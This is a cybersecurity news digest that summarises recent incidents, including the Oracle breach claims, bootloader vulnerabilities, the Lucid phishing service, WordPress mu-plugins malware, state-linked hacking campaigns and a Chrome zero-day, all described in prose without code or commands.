Daily Brief

FBI agents conducted raids on the homes of Xiaofeng Wang, a cybersecurity professor, and his wife Nianli Ma in Bloomington and Carmel, Indiana. Indiana University immediately removed Wang’s profile from its website following the raid and reportedly terminated his position. It is unclear whether Wang and Ma are in custody; they are believed to have possibly relocated abroad around the time of the raids. The raids are part of an unidentified federal investigation, with the FBI providing no specific details but confirming the court-authorized activity. Local police assisted with the raids but only for maintaining scene security, indicating a federal lead in the investigation. Wang has a prestigious academic background and has received significant research funding, suggesting high-profile involvement in the cybersecurity field. The context of the investigation remains speculative, but it draws parallels to historical scrutiny and actions against foreign academics in the U.S. Neighbors reported a dramatic scene during the raids, with FBI agents announcing their presence loudly and removing multiple boxes of evidence from the properties.

Oracle was accused of two major data breaches affecting cloud services, denying any compromise publicly. An unauthorized user allegedly accessed data of six million Oracle cloud customers, including security-sensitive information. The breach reportedly involved exploiting a known vulnerability, CVE-2021-35587, which Oracle had patched previously but not adequately protected in production systems. Independent cybersecurity firms have verified the authenticity of the stolen data, which included personal and security data of Oracle's clients. Oracle is also implicated in potential patient data breach from Oracle Health, with an ongoing FBI investigation. Security experts criticized Oracle for not being transparent about the breach, suggesting it could lead to loss of customer trust and loyalty. There are allegations that Oracle attempted to remove online evidence of the breach using Internet archival tools.

Microsoft's AI-powered Security Copilot identified 20 new vulnerabilities across key bootloaders: GRUB2, U-Boot, and Barebox. The vulnerabilities primarily involve buffer and integer overflows, impacting devices using UEFI Secure Boot. GRUB2, heavily used in Linux distributions, had 11 vulnerabilities that could potentially bypass Secure Boot and install bootkits or compromise system securities like BitLocker. U-Boot and Barebox, prevalent in embedded and IoT devices, had 9 vulnerabilities needing physical device access for exploitation. These vulnerabilities could allow attackers to take complete control over affected devices, impacting the boot process and enabling persistent malware installation. The potential risks include network-wide compromises and continued control after system reinstalls or hardware replacements. Microsoft emphasized the acceleration of vulnerability discovery by AI, reducing the labor-intensive manual analysis time by about a week. Updates released in February 2025 by GRUB2, U-boot, and Barebox aim to mitigate the identified flaws when applied.

A Phishing-as-a-Service (PhaaS) platform called Lucid has been developed and operated by the XinXin group, a collective of Chinese cybercriminals. Lucid has actively targeted 169 organizations across 88 countries using sophisticated iMessage and RCS-based smishing (SMS phishing) campaigns. This PhaaS solution offers subscribers over 1,000 phishing domains and professional spamming tools through a subscription model, purchasable via a dedicated Telegram channel. Automated attack mechanisms via Lucid generate customizable phishing sites distributed mainly through mobile messaging, exploiting iMessage and RCS to avoid conventional spam filtrations. Major entities impersonated in these phishing attacks include USPS, FedEx, Amazon, and various banking institutions, aiming to steal sensitive personal and financial data. Lucid grants users capabilities to validate stolen credit card information, with successful validations leading to the direct use or sale of the data. Operational security for these phishing campaigns includes mobile operations, potentially from vehicles to minimize traceability and evade law enforcement. The widespread and sophisticated nature of Lucid emphasizes a lowered barrier to entry for cybercriminals, improving their success rates and operational scope in cybercrime.

Hackers are increasingly exploiting the WordPress mu-plugins directory to secretly inject malicious code into websites. Security firm Sucuri first identified the technique in February 2025, which involves executing malware on every page load without standard plugin activation. Three main types of malicious payloads were discovered in the mu-plugins directory, aimed at data theft, website redirection, and harmful code injections. The misuse of mu-plugins allows hackers to maintain a persistent presence on the site, complicating detection and removal efforts. Such attacks typically leverage vulnerabilities in existing plugins/themes or exploit weak admin credentials. Sucuri recommends regular updates to themes and plugins, deactivation of unnecessary extensions, and the strengthening of admin accounts with robust passwords and multi-factor authentication. The phenomenon underscores a growing trend of cybercriminals targeting core functionalities of popular content management systems like WordPress for financial gain.

Water Gamayun, a suspected Russian hacking group, has utilized a zero-day vulnerability in the Microsoft Management Console to deploy malware including backdoors SilentPrism and DarkWisp. The group employs sophisticated delivery methods such as provisioning packages, signed .msi files, and .msc files, often mimicking legitimate software. SilentPrism and DarkWisp allow persistent system access, data exfiltration, and execution of commands, featuring advanced evasion measures against detection. The hackers use various malware to steal extensive personal and system information, highlighting a significant interest in cryptocurrency-related data. Water Gamayun has transitioned to using its infrastructure for both malware staging and command-and-control, increasing the effectiveness of its campaigns. The group's malware arsenal includes a mixture of commodity and custom stealers capable of collecting detailed system and user data. EncryptHub, associated with Water Gamayun, previously distributed malware through a deceptive GitHub repository and a fake WinRAR website.

A user on a cybercrime forum claimed to have accessed highly sensitive data from Check Point, including internal network maps, user credentials, and proprietary source code. Check Point contends that the data was old, the incident was previously addressed, and it involved only a limited scope with no impact on customers' primary systems. The cybercriminal used CoreInjection's account to advertise the breach and posted screenshots purportedly showing access to Check Point's admin Infinity portal. Industry experts, including Hudson Rock's CTO Alon Gal, initially found the claims credible but later acknowledged the breach's scope might be narrower than suggested. Check Point asserts no security risk was posed to its customers or employees, describing the published information as a recycling of old data. The breach, clarified to have occurred in December, was due to compromised credentials for a portal account with restricted access, impacting three organizations. Despite claims, Check Point emphasizes that customer systems, production, or security architecture were not compromised.

North Korean Lazarus group has adopted ClickFix tactics to deploy malware targeting individuals seeking jobs in the cryptocurrency industry. ClickFix uses fake error prompts on web documents or websites, tricking users into executing malware through PowerShell commands. Lazarus impersonates reputable companies in the crypto sector such as Coinbase and KuCoin, using fake interviews to lure victims. The campaign involves ClickFake attacks, shifting focus from developers to non-technical roles in cryptocurrency firms, providing tailored instructions based on the user's operating system. Victims infected with GolangGhost malware face risks of system metadata theft and unauthorized file operations, highlighting the need for enhanced cybersecurity measures. Sekoia’s analysis reveals ongoing parallel use of ClickFake and the previous Contagious Interview tactics by Lazarus, indicating an evaluation of both methods. Organizations are urged to verify interview invitations and avoid executing unknown commands, as Sekoia provides detection tools and a list of indicators of compromise to help protect against such threats.

Threat actors are exploiting the "mu-plugins" directory in WordPress to implement malicious code, enabling persistent access and directing visitors to malicious sites. "Mu-plugins," or must-use plugins, are automatically executed without manual activation, making them less visible in standard security checks. This obscurity facilitates their use for malicious activities such as malware deployment. Sucuri's analysis identified three types of rogue PHP code in the mu-plugins directory that disguise their harmful intents, like redirecting users under the facade of browser updates. These scripts are designed to dodge detection by search engine crawlers, thereby avoiding red flags in SEO analytics and allowing continued malicious activity. Attackers are also leveraging compromised WordPress sites to spread malware through deceptive tactics like fake CAPTCHA verifications leading to the installation of Lumma Stealer. The methods for site compromises potentially include vulnerable plugins or themes, exposed admin credentials, and server configuration errors. Recommended mitigative steps include regular updates to plugins and themes, code audits, strong password policies, and the use of web application firewalls to block malicious intrusions and prevent data leaks.

Google recently patched a high-severity Chrome vulnerability (CVE-2025-2783) that was actively exploited to target Russian entities. The Chrome flaw allowed attackers to execute remote code by escaping the browser's sandbox through specially crafted phishing links. This zero-day vulnerability was also identified and patched in Mozilla Firefox and Tor Browser. The ongoing issue raises concerns about persistent cyber threats and emphasizes the importance of timely software updates to mitigate risks. Recommendations include disabling browser autofill for sensitive fields to prevent data leakage and maintaining updated security practices to protect against evolving cyber threats. The report highlights the use of everyday conveniences by attackers to bend rules and access secure systems, underlining the necessity for continuous vigilance in cybersecurity measures.

AWS follows a Shared Responsibility Model, meaning users must manage security measures within their cloud environments. Vulnerabilities such as Server-Side Request Forgery (SSRF) can occur in user-managed applications on AWS, requiring vigilant access controls and data protection. AWS Identity and Access Management (IAM) is critical, but its effectiveness depends on proper customer implementation and configuration to limit access. Customers are solely responsible for the security and patch management of the operating systems and applications they deploy on AWS EC2 instances. AWS does not manage the security of customer data or applications; users must ensure their data storage and access techniques are secure to thwart exposure risks. Customers need to maintain their own firewall setups and manage their attack surface to protect against potential breaches even if AWS secures its infrastructure. Using tools like Intruder can enhance security by offering cloud security scanning, within the framework of AWS's Shared Responsibility Model.

AWS operates on a Shared Responsibility Model, dividing security obligations between AWS and its customers. Customers are in charge of safeguarding their data, applications, and configurations within the AWS environment, despite AWS securing the underlying infrastructure. Real-world vulnerabilities highlighted include the exploitation of SSRF vulnerabilities which can allow server manipulation and unauthorized data access. Proper application of AWS IMDSv2 is recommended to mitigate SSRF attacks, alongside identifying and rectifying application vulnerabilities. AWS customers are advised to ensure precise configurations and access controls to prevent data exposure, especially in S3 buckets and RDS connections. Organizations using AWS must handle OS and software patching themselves, as AWS only maintains the hardware and firmware updates. The importance of securing network configurations, like employing firewalls or VPNs, is essential to protect against unauthorized access and potential zero-day vulnerabilities in applications. Intruder offers cloud security scanning and vulnerability management tools that help organizations maintain robust security postures within AWS environments.

Ukraine targeted by phishing campaign employing file names related to troop movements to distribute the Remcos RAT malware. The attacks have been attributed to Russian hacking group Gamaredon, believed to be connected to Russia's FSB. Gamaredon has used malicious Windows shortcut files disguised as Microsoft Office documents to trick victims. The campaign involves ZIP archives containing a PowerShell downloader which contacts servers in Russia and Germany. The malicious files download further malware that adopts DLL side-loading techniques to execute the Remcos payload. The phishing campaign also featured false CIA, Russian Volunteer Corps, and other impersonations to collect data on Russian individuals. All observed campaigns share the objective of collecting sensitive personal information using website lures.

China has initiated a strict enforcement campaign against illegal collection and use of personal data, led by multiple government agencies. The enforcement targets non-government entities, aligning with China's ongoing extensive surveillance practices on its citizens. Indonesia lifts its ban on iPhone 16, contingent on Apple's commitment to establish an R&D facility, enhancing the local tech ecosystem. New Indonesian regulations restrict social media access for users under 18, requiring parental oversight for account creation by minors. Over 20 Japanese companies in the semiconductor sector have formed an alliance to consolidate resources and enhance competitive capabilities globally. Japan Airlines trialed an AI-based system for cabin crew to efficiently create flight reports using offline language processing technology. India's ISRO successfully tests a new rocket engine design, aimed at increasing payload capacity for upcoming space missions, including a manned spaceflight.

Oracle Health, formed after Oracle's acquisition of Cerner in 2022, experienced unauthorized access to patient data. Hackers obtained patient information from a legacy server using stolen customer credentials. Oracle has notified impacted customers and the FBI might be investigating potential ransom demands. OpenAI increased its maximum bug bounty payout from $20,000 to $100,000 to encourage more high-impact security research. A survey uncovered that over half of IT professionals delay software patches, which leaves systems vulnerable to known exploits. Reviewdog, a GitHub tool, experienced a compromise that exposed secrets in GitHub Actions Workflow Logs. INTERPOL's Operation Red Card resulted in 306 arrests across seven African countries, targeting mobile banking and other scams.